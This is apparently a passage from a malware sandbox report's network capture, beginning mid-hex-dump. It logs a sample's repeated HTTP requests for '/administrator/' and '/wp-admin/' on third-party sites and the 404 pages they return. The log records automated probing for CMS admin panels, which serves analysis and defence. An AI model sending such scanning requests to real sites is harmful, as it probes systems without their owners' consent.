20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.075306892 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.088335991 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.304621935 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.304718971 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                103192.168.2.65496781.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.399056911 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.073004007 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.073012114 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.088140965 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.312815905 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.312824965 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                104192.168.2.65496481.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.399132967 CET231OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.592788935 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
